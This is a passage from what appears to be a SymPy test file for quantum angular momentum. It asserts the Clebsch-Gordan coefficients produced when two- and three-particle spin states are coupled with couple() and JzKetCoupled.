assert JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, 2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, 2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, 1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, -1, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
2, -2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
) == expand(
couple(
uncouple(
JzKetCoupled(
2, -2, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 2))
)
),
((1, 3), (2, 4), (1, 2)),
)
)


def test_couple_2_states_numerical():
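    # Coupling explicit two-particle product states should give the
    # Clebsch-Gordan expansion over JzKetCoupled states of all allowed total j.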
# j1=1/2, j2=1/2
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half))
) == JzKetCoupled(1, 1, (S.Half, S.Half))
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))))
== sqrt(2) * JzKetCoupled(0, 0, (S.Half, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)))
== -sqrt(2) * JzKetCoupled(0, 0, (S.Half, S.Half)) / 2
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half)) / 2
)
assert couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)))
) == JzKetCoupled(1, -1, (S.Half, S.Half))
# j1=1, j2=1/2
assert couple(TensorProduct(JzKet(1, 1), JzKet(S.Half, S.Half))) == JzKetCoupled(
Rational(3, 2), Rational(3, 2), (1, S.Half)
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))))
== sqrt(6) * JzKetCoupled(S.Half, S.Half, (1, S.Half)) / 3
+ sqrt(3) * JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(S.Half, S.Half)))
== -sqrt(3) * JzKetCoupled(S.Half, S.Half, (1, S.Half)) / 3
+ sqrt(6) * JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))))
== sqrt(3) * JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)) / 3
+ sqrt(6) * JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(S.Half, S.Half)))
== -sqrt(6) * JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)) / 3
+ sqrt(3) * JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)) / 3
)
assert couple(
TensorProduct(JzKet(1, -1), JzKet(S.Half, Rational(-1, 2)))
) == JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half))
# j1=1, j2=1
assert couple(TensorProduct(JzKet(1, 1), JzKet(1, 1))) == JzKetCoupled(2, 2, (1, 1))
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0)))
== sqrt(2) * JzKetCoupled(1, 1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, 1, (1, 1)) / 2
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== sqrt(3) * JzKetCoupled(0, 0, (1, 1)) / 3
+ sqrt(2) * JzKetCoupled(1, 0, (1, 1)) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (1, 1)) / 6
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1)))
== -sqrt(2) * JzKetCoupled(1, 1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, 1, (1, 1)) / 2
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0)))
== -sqrt(3) * JzKetCoupled(0, 0, (1, 1)) / 3
+ sqrt(6) * JzKetCoupled(2, 0, (1, 1)) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1)))
== sqrt(2) * JzKetCoupled(1, -1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, -1, (1, 1)) / 2
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1)))
== sqrt(3) * JzKetCoupled(0, 0, (1, 1)) / 3
- sqrt(2) * JzKetCoupled(1, 0, (1, 1)) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (1, 1)) / 6
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0)))
== -sqrt(2) * JzKetCoupled(1, -1, (1, 1)) / 2
+ sqrt(2) * JzKetCoupled(2, -1, (1, 1)) / 2
)
assert couple(TensorProduct(JzKet(1, -1), JzKet(1, -1))) == JzKetCoupled(
2, -2, (1, 1)
)
# j1=3/2, j2=1/2
assert couple(
TensorProduct(JzKet(Rational(3, 2), Rational(3, 2)), JzKet(S.Half, S.Half))
) == JzKetCoupled(2, 2, (Rational(3, 2), S.Half))
assert (
couple(
TensorProduct(
JzKet(Rational(3, 2), Rational(3, 2)), JzKet(S.Half, Rational(-1, 2))
)
)
== sqrt(3) * JzKetCoupled(1, 1, (Rational(3, 2), S.Half)) / 2
+ JzKetCoupled(2, 1, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(TensorProduct(JzKet(Rational(3, 2), S.Half), JzKet(S.Half, S.Half)))
== -JzKetCoupled(1, 1, (Rational(3, 2), S.Half)) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(JzKet(Rational(3, 2), S.Half), JzKet(S.Half, Rational(-1, 2)))
)
== sqrt(2) * JzKetCoupled(1, 0, (Rational(3, 2), S.Half)) / 2
+ sqrt(2) * JzKetCoupled(2, 0, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(JzKet(Rational(3, 2), Rational(-1, 2)), JzKet(S.Half, S.Half))
)
== -sqrt(2) * JzKetCoupled(1, 0, (Rational(3, 2), S.Half)) / 2
+ sqrt(2) * JzKetCoupled(2, 0, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(
JzKet(Rational(3, 2), Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
)
)
== JzKetCoupled(1, -1, (Rational(3, 2), S.Half)) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (Rational(3, 2), S.Half)) / 2
)
assert (
couple(
TensorProduct(JzKet(Rational(3, 2), Rational(-3, 2)), JzKet(S.Half, S.Half))
)
== -sqrt(3) * JzKetCoupled(1, -1, (Rational(3, 2), S.Half)) / 2
+ JzKetCoupled(2, -1, (Rational(3, 2), S.Half)) / 2
)
assert couple(
TensorProduct(
JzKet(Rational(3, 2), Rational(-3, 2)), JzKet(S.Half, Rational(-1, 2))
)
) == JzKetCoupled(2, -2, (Rational(3, 2), S.Half))


def test_couple_3_states_numerical():
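    # Each coefficient below is a product of two Clebsch-Gordan coefficients,
    # one for each pairwise coupling step used to build the three-particle state.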
# Default coupling
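    # With no coupling scheme given, couple() combines the spaces left to right:
    # spaces 1 and 2 couple to an intermediate j12, recorded as (1, 2, j12); that
    # result then couples to space 3 to give the total j, recorded as (1, 3, j).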
    # j1=1/2, j2=1/2, j3=1/2
assert couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
) == JzKetCoupled(
Rational(3, 2),
S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 1), (1, 3, S.Half))
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
            (S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 0), (1, 3, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 1), (1, 3, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
            (S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
            (S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
)
)
== -sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 0), (1, 3, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 2, 1), (1, 3, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
            (S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 0), (1, 3, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
            (S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
            (S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 3
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
) == JzKetCoupled(
Rational(3, 2),
-S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
    # j1=1/2, j2=1/2, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1))
) == JzKetCoupled(2, 2, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2)))
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0)))
== sqrt(2) * JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(2) * JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
)
== sqrt(3) * JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0))) / 3
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
)
== sqrt(2) * JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1))) / 2
- JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
)
== -sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0)))
/ 6
+ sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1))) / 2
+ sqrt(3) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
)
== sqrt(2)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1)))
/ 2
+ JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
)
== -sqrt(2)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1)))
/ 2
- JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
)
)
== -sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0)))
/ 6
- sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1))) / 2
+ sqrt(3) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
)
)
== -sqrt(2)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 0), (1, 3, 1)))
/ 2
+ JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(3) * JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 0))) / 3
- sqrt(2) * JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(6) * JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== -sqrt(2)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 1)))
/ 2
+ sqrt(2) * JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2))) / 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
) == JzKetCoupled(2, -2, (S.Half, S.Half, 1), ((1, 2, 1), (1, 3, 2)))
    # j1=1/2, j2=1, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1))
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)))
== sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)))
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)))
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)))
== sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)))
== -2
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half)))
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ 2
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)))
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1)))
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)))
== -sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half)))
/ 3
- JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 3
- 2
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1)))
== -2
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1)))
== sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half)))
/ 3
+ JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
